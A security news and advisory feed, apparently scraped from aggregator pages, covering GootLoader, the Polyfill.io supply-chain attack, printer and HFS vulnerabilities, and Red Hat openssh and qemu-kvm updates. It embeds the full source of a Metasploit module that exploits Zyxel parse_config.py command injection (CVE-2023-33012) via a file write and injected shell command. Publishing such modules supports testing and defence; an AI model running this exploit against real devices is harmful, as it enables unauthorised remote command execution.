The malware known as GootLoader continues to be in active use by threat actors looking to deliver additional payloads to compromised hosts.
"Updates to the GootLoader payload have resulted in several versions of GootLoader, with GootLoader 3 currently in active use," cybersecurity firm Cybereason said in an analysis published last week.
"While some of the particulars of GootLoader payloads have

SEO Poisoning / Cyber Attack,

The malware known as GootLoader continues to be in active use by threat actors looking to deliver additional payloads to compromised hosts.

"Updates to the GootLoader payload have resulted in several versions of GootLoader, with GootLoader 3 currently in active use," cybersecurity firm Cybereason said in an analysis published last week.

"While some of the particulars of GootLoader payloads have changed over time, infection strategies and overall functionality remain similar to the malware's resurgence in 2020."

GootLoader, a malware loader part of the Gootkit banking trojan, is linked to a threat actor named Hive0127 (aka UNC2565). It abuses JavaScript to download post-exploitation tools and is distributed via search engine optimization (SEO) poisoning tactics.

It typically serves as a conduit for delivering various payloads such as Cobalt Strike, Gootkit, IcedID, Kronos, REvil, and SystemBC.

In recent months, the threat actors behind GootLoader have also unleashed their own command-and-control (C2) and lateral movement tool dubbed GootBot, indicating that the "group is expanding their market to gain a wider audience for their financial gains."

Attack chains involve compromising websites to host the GootLoader JavaScript payload by passing it off as legal documents and agreements, which, when launched, sets up persistence using a scheduled task and executes additional JavaScript to kick-start a PowerShell script for collecting system information and awaiting further instructions.

"Sites that host these archive files leverage Search Engine Optimization (SEO) poisoning techniques to lure in victims that are searching for business-related files such as contract templates or legal documents," security researchers Ralph Villanueva, Kotaro Ogino, and Gal Romano said.

The attacks are also notable for making use of source code encoding, control flow obfuscation, and payload size inflation in order to resist analysis and detection. Another technique entails embedding the malware in legitimate JavaScript library files like jQuery, Lodash, Maplace.js, and tui-chart.

"GootLoader has received several updates during its life cycle, including changes to evasion and execution functionalities," the researchers concluded.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GootLoader Malware Still Active, Deploys New Versions for Enhanced Attacks

The supply chain attack targeting widely-used Polyfill[.]io JavaScript library is wider in scope than previously thought, with new findings from Censys showing that over 380,000 hosts are embedding a polyfill script linking to the malicious domain as of July 2, 2024.
This includes references to "https://cdn.polyfill[.]io" or "https://cdn.polyfill[.]com" in their HTTP responses, the attack

Supply Chain Attack / Malware

The supply chain attack targeting widely-used Polyfill\[.\]io JavaScript library is wider in scope than previously thought, with new findings from Censys showing that over 380,000 hosts are embedding a polyfill script linking to the malicious domain as of July 2, 2024.

This includes references to "https://cdn.polyfill\[.\]io" or "https://cdn.polyfill\[.\]com" in their HTTP responses, the attack surface management firm said.

"Approximately 237,700, are located within the Hetzner network (AS24940), primarily in Germany," it noted. "This is not surprising – Hetzner is a popular web hosting service, and many website developers leverage it."

Further analysis of the affected hosts has revealed domains tied to prominent companies like WarnerBros, Hulu, Mercedes-Benz, and Pearson that reference the malicious endpoint in question.

Details of the attack emerged in late June 2024 when Sansec alerted that code hosted on the Polyfill domain had been modified to redirect users to adult- and gambling-themed websites. The code changes were made such that the redirections only took place at certain times of the day and only against visitors who met certain criteria.

The nefarious behavior is said to have been introduced after the domain and its associated GitHub repository were sold to a Chinese company named Funnull in February 2024.

The development has since prompted domain registrar Namecheap to suspend the domain, content delivery networks such as Cloudflare to automatically replace Polyfill links with domains leading to alternative safe mirror sites, and Google to block ads for sites embedding the domain.

While the operators attempted to relaunch the service under a different domain named polyfill\[.\]com, it was also taken down by Namecheap as of June 28, 2024. Of the two other domains registered by them since the start of July – polyfill\[.\]site and polyfillcache\[.\]com –the latter remains up and running.

On top of that, a more extensive network of potentially related domains, including bootcdn\[.\]net, bootcss\[.\]com, staticfile\[.\]net, staticfile\[.\]org, unionadjs\[.\]com, xhsbpza\[.\]com, union.macoms\[.\]la, newcrbpc\[.\]com, has been uncovered as tied to the maintainers of Polyfill, indicating that the incident might be part of a broader malicious campaign.

"One of these domains, bootcss\[.\]com, has been observed engaging in malicious activities that are very similar to the polyfill\[.\]io attack, with evidence dating back to June 2023," Censys noted, adding it discovered 1.6 million public-facing hosts that link to these suspicious domains.

"It wouldn't be entirely unreasonable to consider the possibility that the same malicious actor responsible for the polyfill.io attack might exploit these other domains for similar activities in the future."

The development comes as WordPress security company Patchstack warned of cascading risks posed by the Polyfill supply chain attack on sites running the content management system (CMS) through dozens of legitimate plugins that link to the rogue domain.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Polyfill[.]io Attack Impacts Over 380,000 Hosts, Including Major Companies

rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

**rejetto HFS vulnerable to OS Command Execution by remote authenticated users**

Critical severity GitHub Reviewed Published Jul 5, 2024 to the GitHub Advisory Database • Updated Jul 8, 2024

GHSA-5f4x-hwv2-w9w2: rejetto HFS vulnerable to OS Command Execution by remote authenticated users

103 models of Toshiba Multi-Function Printers (MFP) are vulnerable to 40 different vulnerabilities including remote code execution, local privilege escalation, xml injection, and more.

Toshiba Multi-Function Printers 40 Vulnerabilities

This Metasploit module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series. The affected firmware versions depend on the device module, see this module's documentation for more details.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Zyxel parse_config.py Command Injection',        'Description' => %q{          This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.          The affected firmware versions depend on the device module, see this module's documentation for more details.          Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment.          If you run into any issues testing this in a real environment we kindly ask you raise an issue in          metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose        },        'Author' => [          'SSD Secure Disclosure technical team', # discovery          'jheysel-r7' # Msf module        ],        'References' => [          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],          [ 'CVE', '2023-33012']        ],        'License' => MSF_LICENSE,        'Platform' => ['linux', 'unix'],        'Privileged' => true,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [ 'Automatic Target', {}]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-01-24',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],          'Reliability' => [ ] # This vulnerability can only be exploited once, more info: https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot        }      )    )    register_options(      [        OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),      ]    )  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js')    })    return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil?    if res.code == 200      product_match = res.body.match(/ZLDSYSPARM_PRODUCT_NAME1="([^"]*)"/)      version_match = res.body.match(/ZLDCONFIG_CLOUD_HELP_VERSION=([\d.]+)/)      if product_match && version_match        product = product_match[1]        version = version_match[1]        if (product.starts_with?('USG') && product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||           (product.starts_with?('USG') && !product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||           (product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||           (product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00'))          return CheckCode::Appears("Product: #{product}, Version: #{version}")        else          return CheckCode::Safe("Product: #{product}, Version: #{version}")        end      end    end    CheckCode::Unknown('Version and product info were unable to be determined.')  end  def on_new_session(session)    super    command_output = ''    # Get the most recently created GRE tunnel interface, bring it down then delete it to allow for subsequent module runs.    if session.type.to_s.eql? 'meterpreter'      newest_gre = session.sys.process.execute '/bin/sh', "-c \"ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1\""      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")      command_output = session.sys.process.execute '/bin/sh', "-c \"ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success\""    elsif session.type.to_s.eql? 'shell'      newest_gre = session.shell_command_token "ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1"      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")      command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success"    end    if command_output.include?('success')      print_good('The GRE interface was successfully removed.')    else      print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed')    end  end  def exploit    # Command injection has a 0x14 byte length limit so keep the file name as small as possible.    # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection.    filename = rand_text_alpha(1)    payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr"    command = payload.raw    command += ' '    command += <<~CMD      2>/var/log/ztplog 1>/var/log/ztplog      (sleep 10 && /bin/rm -rf #{payload_filepath}) &    CMD    command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}"    file_write_pload = "option proto vti\n"    file_write_pload += "option #{command};exit\n"    file_write_pload += "option name 1\n"    config = Base64.strict_encode64(file_write_pload)    data = { 'config' => config, 'fqdn' => "\x00" }    print_status('Attempting to upload the payload via QSR file write...')    file_write_res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),      'data' => data.to_s    })    unless file_write_res && !file_write_res.body.include?('ParseError: 0xC0DE0005')      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')    end    register_files_for_cleanup(payload_filepath)    print_good("File write was successful, uploaded: #{payload_filepath}")    cmd_injection_pload = "option proto gre\n"    cmd_injection_pload += "option name 0\n"    cmd_injection_pload += "option ipaddr ;. #{payload_filepath};\n"    cmd_injection_pload += "option netmask 24\n"    cmd_injection_pload += "option gateway 0\n"    cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n"    cmd_injection_pload += "option remoteip #{Faker::Internet.private_ip_v4_address}\n"    config = Rex::Text.encode_base64(cmd_injection_pload)    data = { 'config' => config, 'fqdn' => "\x00" }    cmd_injection_res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),      'data' => data.to_s    })    # If the payload being used is for example cmd/unix/generic and not a payload spawning any kind of handler (bind or reverse)    # we can query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user.    if payload_instance.connection_type == 'none'      cmd_output_res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')      })      if cmd_output_res&.body && !cmd_output_res.body.empty?        output = cmd_output_res.body.split("</head>\n<body>")[1]        output = output.split("</body>\n</html>")[0]        output = output.gsub("\n\n<br>", '')        output = output.gsub("[IPC]IPC result: 1\n", '')        print_good("Command output: #{output}")      else        print_error("Could not retrieve the command's stout from /ztp/cgi-bin/dumpztplog.py")      end    end    unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005')      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')    end  endend

Zyxel parse_config.py Command Injection

308 different models of Sharp Multi-Function Printers (MFP) are vulnerable to 18 different vulnerabilities including remote code execution, local file inclusion, credential disclosure, and more.

Sharp Multi-Function Printer 18 Vulnerabilities

Red Hat Security Advisory 2024-4312-03 - An update for openssh is now available for Red Hat Enterprise Linux 9. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4312.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: openssh security updateAdvisory ID:        RHSA-2024:4312-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4312Issue date:         2024-07-03Revision:           03CVE Names:          CVE-2024-6387====================================================================Summary: An update for openssh is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.Security Fix(es):* openssh: Possible remote code execution due to a race condition in signal handling (CVE-2024-6387)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6387References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2294604

Red Hat Security Advisory 2024-4312-03

Red Hat Security Advisory 2024-4278-03 - An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4278.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: qemu-kvm security updateAdvisory ID:        RHSA-2024:4278-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4278Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-4467====================================================================Summary: An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.4Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* qemu-kvm: QEMU: 'qemu-img info' leads to host file read/write (CVE-2024-4467)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4467References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-4278-03

Red Hat Security Advisory 2024-4277-03 - An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4277.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: qemu-kvm security updateAdvisory ID:        RHSA-2024:4277-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4277Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-4467====================================================================Summary: An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.2Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* qemu-kvm: QEMU: 'qemu-img info' leads to host file read/write (CVE-2024-4467)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4467References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-4277-03

Red Hat Security Advisory 2024-4276-03 - An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4276.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: qemu-kvm security updateAdvisory ID:        RHSA-2024:4276-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4276Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-4467====================================================================Summary: An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.0Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* qemu-kvm: QEMU: 'qemu-img info' leads to host file read/write (CVE-2024-4467)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4467References:https://access.redhat.com/security/updates/classification/#important

Tag

#js